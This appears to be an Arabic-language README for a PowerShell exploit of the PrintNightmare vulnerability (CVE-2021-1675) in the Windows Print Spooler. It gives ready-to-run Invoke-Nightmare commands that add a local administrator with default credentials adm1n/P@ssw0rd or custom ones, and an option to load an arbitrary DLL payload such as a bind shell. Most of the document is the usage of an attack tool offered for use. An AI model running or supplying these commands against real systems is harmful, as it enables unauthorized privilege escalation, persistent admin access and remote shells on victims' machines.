
استغلال PowerShell لـ CVE-2021-1675 (PrintNightmare) يقوم بترقية الامتيازات المحلية عبر Print Spooler، مع حقن حمولة DLL مخصصة لإضافة مستخدمين محليين من المسؤولين.
Caleb Stewart | John Hammond | June 1, 2021
CVE-2021-1675 هي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بعد ورفع الامتيازات المحلية تسمى "PrintNightmare".
تم إصدار برامج استغلال لإثبات المفهوم (Python، C++) لقدرة تنفيذ التعليمات البرمجية عن بعد، و إصدار C# لرفع الامتيازات المحلية. لم نرَ تطبيقًا أصليًا في PowerShell الخالص، وأردنا تجربة تحسين وإعادة صياغة الاستغلال.
يقوم هذا السكريبت PowerShell بتنفيذ رفع الامتيازات المحلية (LPE) باستخدام تقنية الهجوم PrintNightmare.

تم اختباره على Windows Server 2016 و Windows Server 2019.
إضافة مستخدم جديد إلى مجموعة المسؤولين المحليين افتراضيًا:
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default
Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure"
قم بتوفير حمولة DLL مخصصة لفعل أي شيء آخر قد ترغب فيه.
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"